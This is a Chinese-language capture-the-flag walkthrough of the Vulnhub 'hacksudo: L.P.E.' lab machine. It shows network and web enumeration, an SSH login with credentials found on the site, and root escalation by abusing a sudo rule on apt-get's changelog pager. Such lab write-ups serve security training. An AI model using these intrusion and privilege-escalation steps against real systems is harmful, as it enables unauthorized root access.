Vulnhub之Hacksudo LPE靶机详细解题过程
Hacksudo LPE
作者: Jason_huawen
靶机基本信息
名称:hacksudo: L.P.E.
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.126.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.215 08:00:27:b3:96:72 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.215
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.215 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 08:58 EST
Nmap scan report for localhost (192.168.56.215)
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:ad:52:59:dc:7f:b0:e3:5b:47:36:d2:e7:1d:1a:5a (RSA)
| 256 d6:3f:d5:8e:fe:10:f5:bc:2c:a8:53:3b:78:ec:30:4e (ECDSA)
|_ 256 b5:1e:df:2d:3f:3f:c6:f9:ca:37:a7:dc:8c:ba:c2:fa (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
4200/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=debian
| Not valid before: 2021-05-01T13:03:08
|_Not valid after: 2041-04-26T13:03:08
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B3:96:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、4200(HTTPS)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ nikto -h http://192.168.56.215
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.215
+ Target Hostname: 192.168.56.215
+ Target Port: 80
+ Start Time: 2022-11-23 09:01:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2022-11-23 09:02:11 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo
Nikto虽然给出了一些结果,比如/login.php,还有其他几个目录,但基本上没有利用价值。
接下来用Gobuster工具扫描目标站点有无其他文件和目录:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ gobuster dir -u http://192.168.56.215 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.215
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,php,html,txt
[+] Timeout: 10s
===============================================================
2022/11/23 09:03:15 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/contact.php (Status: 200) [Size: 82287]
/about.php (Status: 200) [Size: 73082]
/img (Status: 301) [Size: 314] [--> http://192.168.56.215/img/]
/products.html (Status: 200) [Size: 16638]
/login.php (Status: 200) [Size: 2886]
/index.php (Status: 302) [Size: 0] [--> login.php]
/header.php (Status: 302) [Size: 0] [--> /login.php]
/p (Status: 301) [Size: 312] [--> http://192.168.56.215/p/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.215/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.215/js/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.215/javascript/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.html (Status: 200) [Size: 9057]
/config.php (Status: 200) [Size: 0]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.215/fonts/]
/challenge (Status: 301) [Size: 320] [--> http://192.168.56.215/challenge/]
/det (Status: 301) [Size: 314] [--> http://192.168.56.215/det/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102060 / 1102805 (99.93%)===============================================================
2022/11/23 09:05:51 Finished
===============================================================
从Gobuster工具运行结果可以看出成功扫描出来/challenge目录,访问该目录:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /challenge</title>
</head>
<body>
<h1>Index of /challenge</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="apt-get.php">apt-get.php</a></td><td align="right">2021-05-10 03:49 </td><td align="right">2.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge.php">challenge.php</a></td><td align="right">2021-04-26 02:56 </td><td align="right">816 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge1.php">challenge1.php</a></td><td align="right">2021-05-16 01:43 </td><td align="right">2.9K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge2.php">challenge2.php</a></td><td align="right">2021-05-16 01:43 </td><td align="right">2.1K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge3.php">challenge3.php</a></td><td align="right">2021-05-16 01:43 </td><td align="right">1.7K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge4.php">challenge4.php</a></td><td align="right">2021-05-16 01:44 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge5.php">challenge5.php</a></td><td align="right">2021-05-16 01:44 </td><td align="right">1.6K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge6.php">challenge6.php</a></td><td align="right">2021-05-16 01:44 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge8.php">challenge8.php</a></td><td align="right">2021-05-16 01:45 </td><td align="right">1.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge9.php">challenge9.php</a></td><td align="right">2021-05-16 01:45 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge10.php">challenge10.php</a></td><td align="right">2021-05-16 01:46 </td><td align="right">1.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge11.php">challenge11.php</a></td><td align="right">2021-05-13 05:28 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="demo.php">demo.php</a></td><td align="right">2021-05-10 03:55 </td><td align="right">2.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="flag.php">flag.php</a></td><td align="right">2021-05-10 05:21 </td><td align="right">917 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="logo.png">logo.png</a></td><td align="right">2021-04-26 04:31 </td><td align="right"> 29K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="page/">page/</a></td><td align="right">2021-05-16 01:26 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.215 Port 80</address>
</body></html>
返回页面中的第一个链接含有用户名密码信息:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/apt-get.php
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
<h2 style="padding-bottom: 190px;"></h2>
<form method="post" action="../challenge/challenge1.php">
<button type="submit" class="btn btn-outline-dark" style="margin-bottom: -100px">Back</button>
</form>
<h3><p style="text-align:right;"><a href="https://leetvilu.blogspot.com/">For more information about apt-get</a></p></h3>
</body>
<hr class="hr">
<div class="container">
<footer class="footer">
<center><p style="margin-left:65px; color:#777777" class="text-center" >© HackSudo 2021</p></center>
</footer>
</div>
<script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
</html>
尝试一下,看是否可以使用用户名user1和密码hacksudo登录ssh
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ ssh user1@192.168.56.215
The authenticity of host '192.168.56.215 (192.168.56.215)' can't be established.
ED25519 key fingerprint is SHA256:iSCtzn93Zn0wahmO4fJNBoPyqcsZCVH++PlJTVmt7Xs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.215' (ED25519) to the list of known hosts.
user1@192.168.56.215's password:
Linux hacksudoLPE 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 16 04:16:42 2021 from 192.168.1.4
user1@hacksudoLPE:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@hacksudoLPE:~$
提权
user1@hacksudoLPE:~$ sudo -l
Matching Defaults entries for user1 on hacksudoLPE:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user1 may run the following commands on hacksudoLPE:
(root) NOPASSWD: /usr/bin/apt-get
user1@hacksudoLPE:~$
Sudo -l 结果说明可以利用apt-get进行提权,参考GTFOBINS网站的提权方法,即可成功提权!
user1@hacksudoLPE:~$ sudo /usr/bin/apt-get changelog apt
Get:1 store: apt 1.8.2.2 Changelog
Fetched 458 kB in 0s (44.3 MB/s)
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 68K
drwx------ 5 root root 4.0K May 16 2021 .
drwxr-xr-x 21 root root 4.0K May 7 2021 ..
-rw------- 1 root root 1.8K May 16 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K May 6 2021 .gnupg
-rw------- 1 root root 36 May 1 2021 .lesshst
drwxr-xr-x 3 root root 4.0K May 1 2021 .local
-rw------- 1 root root 0 May 6 2021 .node_repl_history
-rw-r--r-- 1 root root 176 May 1 2021 .profile
-rw-r--r-- 1 root root 11 May 16 2021 root.txt
-rw-r--r-- 1 root root 75 May 8 2021 .selected_editor
drwx------ 2 root root 4.0K May 16 2021 .ssh
-rw------- 1 root root 24K May 16 2021 .viminfo
# cat root.txt
viluhacker
成功提权,拿到root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
